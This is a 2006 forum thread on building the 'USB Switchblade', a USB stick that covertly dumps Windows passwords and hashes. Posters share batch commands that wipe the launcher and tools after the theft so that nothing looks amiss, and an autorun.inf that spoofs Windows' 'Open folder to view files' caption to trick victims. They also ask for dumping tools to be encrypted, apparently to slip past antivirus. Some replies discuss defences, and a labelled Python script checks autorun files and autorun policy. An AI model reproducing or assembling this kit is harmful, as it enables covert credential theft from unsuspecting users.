marc Posted September 21, 2006

(offtopic, how's your finger?)
Irving Washington Posted September 21, 2006

This is all for non-U3 versions - it may be applicable to U3, but as I don't have it, I won't speculate...

I've tried Silivrenion's version of the Switchblade, and have added the following to the batch file:

    if not exist "Removable Disk" md "Removable Disk" >nul
    Start explorer.exe "Removable Disk"

This is a slight improvement in that it:
a) does something after trying to open the USB drive
b) opens into a folder other than the one containing all the dodgy stuff ;)

You can obviously change this to do what you like. Bearing in mind that it's a 'SocEng' (wetware) exploit to get someone to run the code, opening a folder that has a load of .exes, or hidden folders/files, batch files, or a combination is going to worry people somewhat. So the initial fix is to open a new folder that doesn't contain all the naughty stuff.

I'm working on 2 vastly superior versions of this - will post once done.
Irving Washington Posted September 21, 2006

Irving Washington's One Time Version

This is an updated version of Silivrenion's technique, which uses a modified batch file to remove evidence of the steal and launch Explorer.exe following the data theft. This means the USB key can only be used once before needing 'priming' again, but has the benefit of appearing as though nothing has happened (other than a slightly slow Explorer launch).

Mods to Siliv's version are as follows: add the following to switchblade.bat before :End

    REM back up to the root of the key, remove the launcher and the tools, then open Explorer there
    cd ..\..
    DEL /f /q nircmd.exe >nul
    DEL /f /q autorun.inf >nul
    RMDIR /s /q WIP >nul
    Start explorer.exe .
    REM last line: nothing further is read from the file, so it can delete itself
    DEL /f /q switchblade.bat >nul

If you want, you can use the ATTRIB command to hide the logfile(s), but be warned that people like myself who enable the 'show hidden files' view will still see these files and be intrigued...
marc Posted September 21, 2006

Damn this works well. I edited the autorun.inf file (on the Amish/non-U3 version) to make it more realistic:

    [autorun]
    action=Open folder to view files
    icon=iconsfolder.ico
    shellexecute=nircmd.exe execmd CALL batexeprogstart.bat
marc Posted September 21, 2006

Sorry for the double post, but I just have something involving morals to say. I believe that learning this can help ourselves for antivirus protection. Our knowledge of the tricks used by viruses can only expand, such as that social trick in Amish's version, or the U3 CD partition. No longer will I feel safe that by inserting a USB drive into my PC, nothing will execute unless I double-click on what I want. AVs should realise that we do want to learn about this stuff. It is very useful to know. Besides, how can an AV block a social trick in autorun.inf? There are some things we NEED to know about.
Silva Posted September 21, 2006

> Sorry for the double post, but I just have something involving morals to say. [...] Besides, how can an AV block a social trick in autorun.inf? There are some things we NEED to know about.

You could just disable autorun like most of the people I know (they disable it because they hate the annoying pop-up when they put in CDs) and you'll be completely safe from this attack, and Norton AV 2003 does ask if you want to run the program from the removable media object (something along those lines) if you use the non-U3 way.
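Added example, not code from this thread or from the Switchblade project: a small Python triage script for the two things the last few posts turn on, marc's autorun.inf with its spoofed "Open folder to view files" caption and Silva's advice to just disable autorun. It parses the [autorun] section, lists the directives that actually launch something (open, shellexecute, shell\verb\command), and checks a NoDriveTypeAutoRun policy value against a drive type the way Windows does: bit N of the value disables AutoRun for GetDriveType() result N, so removable media is 0x04 and CD-ROM is 0x20, 0x91 is the Windows XP default and 0xFF turns it off everywhere. The sample .inf contents and the file names inside them are constructed for the example and are not the project's layout.

```python
# Added example, not code from this thread or the Switchblade project.
# Triage an autorun.inf: what would it launch, and would this host honour it?

# GetDriveType() return values (winbase.h).
DRIVE_UNKNOWN, DRIVE_NO_ROOT_DIR, DRIVE_REMOVABLE = 0, 1, 2
DRIVE_FIXED, DRIVE_REMOTE, DRIVE_CDROM, DRIVE_RAMDISK = 3, 4, 5, 6

# NoDriveTypeAutoRun, under HKLM or HKCU
# \Software\Microsoft\Windows\CurrentVersion\Policies\Explorer:
# bit N set disables AutoRun for drive type N, so removable = 0x04, CD-ROM = 0x20.
POLICY_XP_DEFAULT = 0x91    # unknown (0x01), network (0x10) and unknown-type (0x80) off
POLICY_ALL_DISABLED = 0xFF  # what "just disable autorun" amounts to

# [autorun] keys that launch a program rather than merely label the drive.
EXEC_KEYS = ("open", "shellexecute")
# Caption Windows itself uses for the harmless choice in the AutoPlay dialog.
WINDOWS_OPEN_FOLDER_CAPTION = "open folder to view files"


def parse_autorun(text):
    """Return the [autorun] section as {lowercase key: value}.

    Keys are case-insensitive to Windows; lines before the section header,
    comments (;) and other sections such as [DeviceInstall] are ignored.
    """
    entries = {}
    in_autorun = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line[1:-1].strip().lower() == "autorun"
            continue
        if in_autorun and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def launch_directives(entries):
    """Keys that cause execution: open, shellexecute and shell\\<verb>\\command."""
    return sorted(
        key for key in entries
        if key in EXEC_KEYS
        or (key.startswith("shell\\") and key.endswith("\\command"))
    )


def autorun_disabled(policy, drive_type):
    """True if NoDriveTypeAutoRun masks AutoRun off for this drive type."""
    return bool((policy >> drive_type) & 1)


def triage(text, drive_type, policy=POLICY_XP_DEFAULT):
    """Summarise what the file launches and whether the host policy lets it."""
    entries = parse_autorun(text)
    directives = launch_directives(entries)
    caption = entries.get("action", "").strip().lower()
    return {
        "launches": directives,
        # The wetware trick: a launch entry captioned exactly like Windows' own
        # "open folder" option, so the user picks it without a second look.
        "spoofed_caption": bool(directives) and caption == WINDOWS_OPEN_FOLDER_CAPTION,
        "policy_allows": bool(directives) and not autorun_disabled(policy, drive_type),
    }


# Constructed samples (file names are illustrative, not the project's layout).
SWITCHBLADE_INF = """[autorun]
action=Open folder to view files
icon=icons\\folder.ico
shellexecute=nircmd.exe execmd CALL bat\\start.bat
"""

BENIGN_INF = """[autorun]
label=Holiday photos
icon=camera.ico
"""

if __name__ == "__main__":
    cases = (
        ("removable, XP default", DRIVE_REMOVABLE, POLICY_XP_DEFAULT),
        ("CD-ROM (U3 partition), XP default", DRIVE_CDROM, POLICY_XP_DEFAULT),
        ("removable, AutoRun fully disabled", DRIVE_REMOVABLE, POLICY_ALL_DISABLED),
    )
    for name, inf in (("switchblade", SWITCHBLADE_INF), ("benign", BENIGN_INF)):
        for label, drive, policy in cases:
            print(f"{name:12s} {label:36s} {triage(inf, drive, policy)}")
```

Run it as a script to see the three cases side by side. With the XP default, "policy_allows" on a removable drive means the spoofed entry is offered in the AutoPlay dialog and still needs the user's click, which is the social-engineering step in Amish's technique; the same file on the CD-ROM partition a U3 stick presents runs without one, which is the difference Darren draws between the two techniques later in the thread. Setting the value to 0xFF under the Policies\Explorer key makes both cases come back as blocked.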
marc Posted September 21, 2006

Absolutely Silva, but I am talking about the general knowledge you can get from this. Who would expect a flash disk to have a CD partition? I know some people just use common sense instead of any real AV, but very little can be trusted.
Darren Kitchen (Author) Posted September 21, 2006

> Sorry for the double post, but I just have something involving morals to say. [...] No longer will I feel safe that by inserting a USB drive into my PC, nothing will execute unless I double-click on what I want.

Since USB keys went mainstream I've always been wary of the autorun threat, so much so that I've made it a habit to hold the Shift key while inserting any untrusted media.
moonlit Posted September 21, 2006

It seems that this doesn't work on Windows 2003 (or at least doesn't with the tests I've tried with autorun.inf on USB devices), but yeah, it's always a good idea to be careful with untrusted media...
Darren Kitchen (Author) Posted September 21, 2006

Sorry for the double post, but two quick things:

1. Staples is having a sale on the U3-enabled SanDisk Cruzer Micro drives. I picked up a 512 MB in store for $14.99. The 1 GB is about $25 and the 2 GB is about $45. The sale works both online and in-store and is good until September 23rd (this Saturday). Now that I've got two I can have a lethal and a non-lethal USB drive on my keychain.

2. I just got off the phone with the Sr. Editor of a well-known computer magazine in the US. They will be printing a story about the USB Switchblade on their website some time tomorrow (I'll provide a link when it's live), and possibly in next week's print edition of the magazine. Way to go everyone who's contributed, this project is totally rocking! I feel like we're actually bringing awareness to both regular users and IT pros about these attack vectors. Hopefully the editor will say something nice about us.
Darren Kitchen (Author) Posted September 21, 2006

> It seems that this doesn't work on Windows 2003 (or at least doesn't with the tests I've tried with autorun.inf on USB devices) [...]

Amish or MaxDamage technique?
renegadecanuck Posted September 21, 2006

Sorry if it's a double post, but I keep getting "Logon to \\127.0.0.1\ADMIN$ failed: code 64" for the SAM dump.
marc Posted September 21, 2006

I'm thinking of buying a U3 device. Is it worth it? Or perhaps stick with the non-U3 version? Is U3 worth it just for the real U3 technology, i.e. out of the box? I might get a Cruzer 1GB.
johnsrobotics Posted September 21, 2006

I can't seem to find those prices... I found the 2GB for $90: http://www.circuitcity.com/ssm/SanDisk-Cru...roductDetail.do

I do see a 1GB for $45... unless someone can point me to a 2GB for $45, I'll just go with 2 512MB drives for $40. I need to get one for general use anyway, as I don't even pwn one yet.
moonlit Posted September 21, 2006

> > It seems that this doesn't work on Windows 2003 [...]
>
> Amish or MaxDamage technique?

Neither, though it would've been Amish's technique... I tried with a DIY autorun.inf with Notepad as the app to run, and an app I think was called Ceedo which uses autorun to open a menu when you insert the device... I did have the idea of using an MP3 player or a digital camera to store the stuff on for Amish's method because that'd look even less conspicuous; who's gonna suspect a digicam? I didn't get a chance to test that though since, as I say, it failed on Win2k3 and I don't have an XP box right now (thinking I should use a VM for testing stuff like this).
Darren Kitchen (Author) Posted September 21, 2006

> I can't seem to find those prices... I found the 2GB for $90 [...] I need to get one for general use anyway, as I don't even pwn one yet.

    $15 512MB
    $25 1GB
    $45 2GB

Those links are from the Staples store in my area (Williamsburg, VA). AFAIK it's nationwide. I picked up a 512 MB for $15 today in Vienna, VA in store at that sale price. Sale ends on the 23rd. We're not affiliated with SanDisk or Staples, but it's a damn good deal.

Both the U3 method and the Amish method work great. I think Amish made clever use of some social engineering, but personally I'm a bit more fond of the U3 technique since it doesn't require any key presses/mouse clicks. (No offence Amish)
johnsrobotics Posted September 22, 2006

Awesome. Picked up 2 2GBers. Thanks!
renegadecanuck Posted September 22, 2006

> Sorry if it's a double post, but I keep getting "Logon to \\127.0.0.1\ADMIN$ failed: code 64" for the SAM dump.

Hmm, I can get it to work on other computers apparently, just not on my test computer...
Irving Washington Posted September 22, 2006

Another use for this could be as a useful security device for you. If you can set the autorun to clean history, close encrypted shares etc., it's a lot easier than remembering/installing routines/applications to do this - basically it could mean that you can wipe traces from any machine you use...
Darren Kitchen (Author) Posted September 22, 2006

> Another use for this could be as a useful security device for you. [...] basically it could mean that you can wipe traces from any machine you use...

Remember in episode 1x02 or 1x03 the Windows Firewall automation script? My goal was to make changes to several Windows firewalls without the use of group policies, so I'd have to physically go to each machine. While the script wasn't malicious in nature, it used the same technique as Amish's hack to run my firewall script. The same could be done with U3. I could see it being used for white-hat purposes such as installing updates, the latest anti-virus definitions, testing for security best practices. But then again, by the time the automation part actually starts to break even in time spent administrating each machine, you're probably already in a domain environment with enough flexibility with the clients that this could all be automated from the server anyway. Ahh, thinking out loud again.
Irving Washington Posted September 22, 2006

Agreed, from the point of view of administering a number of machines it's impractical, but from the point of view of you using machines in public places, schools, libraries, etc., it could be useful for cleaning up after yourself...
flick650 Posted September 22, 2006

Hi renegadecanuck, I posted a fix for your problem a couple of pages back. The problem is with PWDUMP; go and get the latest version and replace the version on your key. It works perfectly after.
flick650 Posted September 22, 2006

Sorry for the second post, but has anybody else seen the story that is floating around digg.com at the moment? http://passivemode.net/updates/2006/6/5/wi...on-exploit.html

It allows you to get admin using just the AT command. I am working on integrating it into my USB key; I will let you know the results. Unfortunately it does mean the key has to be in there for about a minute and a half, but it might help.
Sloth Posted September 22, 2006

> Sorry for the second post, but has anybody else seen the story that is floating around digg.com at the moment? [...] It allows you to get admin using just the AT command.

Correct me if I'm wrong, but I don't think this works the way you think it does. OK, the only way I got this to work was by trying from an admin account to escalate to SYSTEM; this did not work to escalate from a limited user to SYSTEM. Maybe I did something wrong, but I think it was a proof of concept to get higher privileges than admin, not an actual escalation from limited to a higher privilege.

-Sloth
therian16 Posted September 22, 2006

Great work on the project so far, but we need a few more files encrypted: netpass.exe, mspass.exe and the 6.0 version of pwdump. An alternative to pwdump is fgdump; it looks and sounds good, but it needs to be encrypted before I can test it fully.

Thanks,
Brainkill